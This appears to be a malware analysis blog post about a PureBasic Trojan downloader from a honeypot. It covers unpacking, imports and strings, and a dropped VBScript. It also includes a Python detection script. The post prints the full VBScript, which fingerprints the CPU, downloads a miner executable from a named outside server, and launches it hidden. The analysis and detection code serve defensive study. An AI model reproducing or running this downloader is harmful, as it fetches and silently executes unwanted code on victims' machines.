An analysis of a Trojan Downloader I came across in one of my honeypots.
A quick analysis of the file using ProtectionID shows the file is packed with UPX, so let's unpack it quickly using the -d flag that UPX provides.
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2017
UPX 3.94w Markus Oberhumer, Laszlo Molnar & John Reiser May 12th 2017

File size Ratio Format Name
-------------------- ------ ----------- -----------
69632 <- 36352 52.21% win32/pe downloader.exe

Unpacked 1 file.
Let's check the file again in ProtectionID and see what it finds.
File Type : 32-Bit Exe (Subsystem : Win GUI / 2), Size : 69632 (011000h) Byte(s) | Machine: 0x14C (I386)
Compilation TimeStamp : 0x588079E7 -> Thu 19th Jan 2017 08:33:43 (GMT)
[TimeStamp] 0x588079E7 -> Thu 19th Jan 2017 08:33:43 (GMT) | PE Header | - | Offset: 0x00000088 | VA: 0x00400088 | -
[File Heuristics] -> Flag #1 : 00000000000000001100000000000000 (0x0000C000)
[Entrypoint Section Entropy] : 5.20 (section #0) ".code " | Size : 0x3063 (12387) byte(s)
[DllCharacteristics] -> Flag : (0x0000) -> NONE
[SectionCount] 5 (0x5) | ImageSize 0x15000 (86016) byte(s)
[ModuleReport] [IAT] Modules -> KERNEL32.DLL | COMCTL32.DLL | GDI32.DLL | MSVCRT.dll | OLE32.DLL | SHELL32.DLL | SHLWAPI.DLL | USER32.DLL | WINMM.DLL
[CompilerDetect] -> PureBASIC
[!] File appears to have no protection or is using an unknown protection
- Scan Took : 0.140 Second(s) [00000008Ch (140) tick(s)] [506 of 580 scan(s) done]
A pretty unusual sample, in the sense that it has been coded in PureBasic.
The good news is that there is no more obvious protection around the sample!
Using IDA, a quick survey of the imports and strings in use reveals a few interesting things.
1. .data:00412025 00000005 C .vbs
2. 004126C8 CreateFileA KERNEL32
3. 004126D0 WriteFile KERNEL32
The above 3 things are interesting given that .vbs references a VBScript file and there are no networking functions in the imports themselves – so it stands to reason that there is a script that will be written and executed at some point during the execution of the sample.
Let's focus on this idea, since it is possible that the .vbs file could be a major part of the infection process.
After a little bit of debugging I was able to extract the following VBScript file, which the sample wrote to the %temp% folder:
0018FF78 01C15910 "C:\\Users\\MW\\AppData\\Local\\Temp\\CD84.tmp\\CD85.vbs"
The VBScript contains the following code:
Option Explicit
Const ForReading = 1
Const ForWriting = 2
Dim ObjWMI, ColSettings, ObjProcessor, cpuminer, videocardminer, WshShell, objStdOut, cpucount
Dim StrComputer, ObjNetwork, objFSO, objWMIService, architectura, proccores, gram, gpu, objItem, lool
Set objStdOut = WScript.StdOut
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
Set ObjNetwork = WScript.CreateObject("WScript.Network")
StrComputer = Trim(ObjNetwork.ComputerName)
Set ObjNetwork = Nothing
Set ObjWMI = GetObject("WINMGMTS:" & "{ImpersonationLevel=Impersonate,AuthenticationLevel=Pkt}!\\" & StrComputer & "\Root\CIMV2")
' Fingerprint the CPU(s) over WMI to decide which payload to fetch.
' Win32_Processor.ProcessorType: 2 = unknown, 3 = central processor, 4 = math processor, 6 = video processor
' Win32_Processor.Architecture: 0 = x86, 6 = Itanium, 9 = x64
Set ColSettings = ObjWMI.ExecQuery ("SELECT * FROM Win32_Processor")
Set WshShell = WScript.CreateObject("WScript.Shell")
cpuminer = false
architectura = 0
videocardminer = false
For Each ObjProcessor In ColSettings
    If ObjProcessor.ProcessorType = 3 OR ObjProcessor.ProcessorType = 2 Then
        cpuminer = true
        proccores = ObjProcessor.NumberOfLogicalProcessors
        videocardminer = false
    End If
    If ObjProcessor.ProcessorType = 4 OR ObjProcessor.ProcessorType = 6 Then
        cpuminer = false
        videocardminer = true
    End If
    If ObjProcessor.Architecture = 0 AND ObjProcessor.AddressWidth = 32 Then
        architectura = 32
    End If
    If (ObjProcessor.Architecture = 6 OR ObjProcessor.Architecture = 9) AND ObjProcessor.DataWidth = 64 AND ObjProcessor.AddressWidth = 32 Then
        architectura = 32
    End If
    If (ObjProcessor.Architecture = 6 OR ObjProcessor.Architecture = 9) AND ObjProcessor.DataWidth = 64 AND ObjProcessor.AddressWidth = 64 Then
        architectura = 64
    End If
Next
' Synchronous GET of myURL; the raw response body is written to myPath via an ADODB.Stream.
Sub HTTPDownload( myURL, myPath )
    dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
    dim bStrm: Set bStrm = createobject("Adodb.Stream")
    xHttp.Open "GET", myURL, False
    xHttp.Send
    with bStrm
        .type = 1 '//binary
        .open
        .write xHttp.responseBody
        .savetofile myPath, 2 '//overwrite
    end with
End Sub
Set ObjProcessor = Nothing: Set ColSettings = Nothing: Set ObjWMI = Nothing: StrComputer = vbNullstring
If architectura=64 Then
    HTTPDownload "http://v91049e6.beget.tech/[email protected]/6/csrs.exe","./csrs.exe"
End if
If architectura=32 Then
    HTTPDownload "http://v91049e6.beget.tech/[email protected]/3/csrs.exe","./csrs.exe"
End if
' Window style 0: the downloaded file is launched with no visible window.
WshShell.Run "csrs.exe", 0
Quite obviously, the script downloads one of two variants of a file named csrs.exe, chosen by system architecture (one for 32-bit and one for 64-bit), and then executes the downloaded file.
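As an added example (my own triage code, not part of the original post or the sample), a small Python script that flags the downloader chain the dropped VBScript uses: an XMLHTTP object whose response is pushed through an ADODB.Stream, saved to disk, and launched hidden through WScript.Shell Run with window style 0. Both VBScript inputs are constructed excerpts; the download host is a placeholder, not the server seen in the analysis.

```python
import re

# Constructed excerpt that mirrors the structure of the dropped script; the
# download host is a placeholder, not the live server from the analysis.
SAMPLE_VBS = r'''
Set ColSettings = ObjWMI.ExecQuery ("SELECT * FROM Win32_Processor")
Sub HTTPDownload( myURL, myPath )
    dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
    dim bStrm: Set bStrm = createobject("Adodb.Stream")
    xHttp.Open "GET", myURL, False
    xHttp.Send
    bStrm.type = 1
    bStrm.open
    bStrm.write xHttp.responseBody
    bStrm.savetofile myPath, 2
End Sub
If architectura=64 Then HTTPDownload "http://dropper.example.invalid/6/csrs.exe","./csrs.exe" End if
If architectura=32 Then HTTPDownload "http://dropper.example.invalid/3/csrs.exe","./csrs.exe" End if
WshShell.Run "csrs.exe", 0
'''

# Constructed benign control: inventories CPUs over WMI, never downloads or executes.
BENIGN_VBS = r'''
For Each cpu In GetObject("winmgmts:\\.\root\cimv2").ExecQuery("SELECT * FROM Win32_Processor")
    WScript.Echo cpu.Name & " arch=" & cpu.Architecture
Next
'''

# VBScript identifiers are case-insensitive, so every pattern is matched with re.I.
INDICATORS = {
    "http_client":   r'createobject\s*\(\s*"(?:Microsoft\.XMLHTTP|MSXML2\.(?:Server)?XMLHTTP[\w.]*)"',
    "binary_stream": r'createobject\s*\(\s*"Adodb\.Stream"',
    "write_to_disk": r'\.savetofile\b',
    "hidden_exec":   r'\.Run\s+"[^"]+"\s*,\s*0\b',   # WScript.Shell Run, window style 0 = hidden
    "wmi_cpu_query": r'\bWin32_Processor\b',
}

def triage_vbs(text):
    """Classify a VBScript and pull out its download URLs and the command it launches."""
    hits = {name: bool(re.search(pat, text, re.I)) for name, pat in INDICATORS.items()}
    urls = sorted(set(re.findall(r'https?://[^\s"\']+', text, re.I)))
    executed = re.findall(r'\.Run\s+"([^"]+)"', text, re.I)
    # Verdict needs the full chain (fetch -> binary stream -> saved to disk -> launched hidden);
    # the WMI query alone is only fingerprinting and is common in legitimate admin scripts.
    downloader = all(hits[k] for k in ("http_client", "binary_stream", "write_to_disk", "hidden_exec"))
    return {"indicators": hits, "urls": urls, "executed": executed, "downloader": downloader}

if __name__ == "__main__":
    for label, script in (("dropped", SAMPLE_VBS), ("benign", BENIGN_VBS)):
        print(label, triage_vbs(script))
```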
The downloaded file is a BitcoinMiner, but I am not going to go into that in this post.
References
Sample SHA-256: 6d1d946fc8a3ea0610bdef966bcd3a0e452278f0584f4058ca593d03c22dbe4c
Tools
- x64Dbg – http://x64dbg.com/
- VirusTotal – https://virustotal.com
- ProtectionID – https://pid.gamecopyworld.com/
- Yara – https://virustotal.github.io/yara/
- Hex-Rays IDA-Pro
VirusTotal
Sample Analysis:
https://virustotal.com/en/file/6d1d946fc8a3ea0610bdef966bcd3a0e452278f0584f4058ca593d03c22dbe4c/analysis/
CSRS.exe Analysis:
https://virustotal.com/en/file/330174725c331dcb9e75aaf4aeeefd5ec97fb04f01630afa6dc3282e34acc2e8/analysis/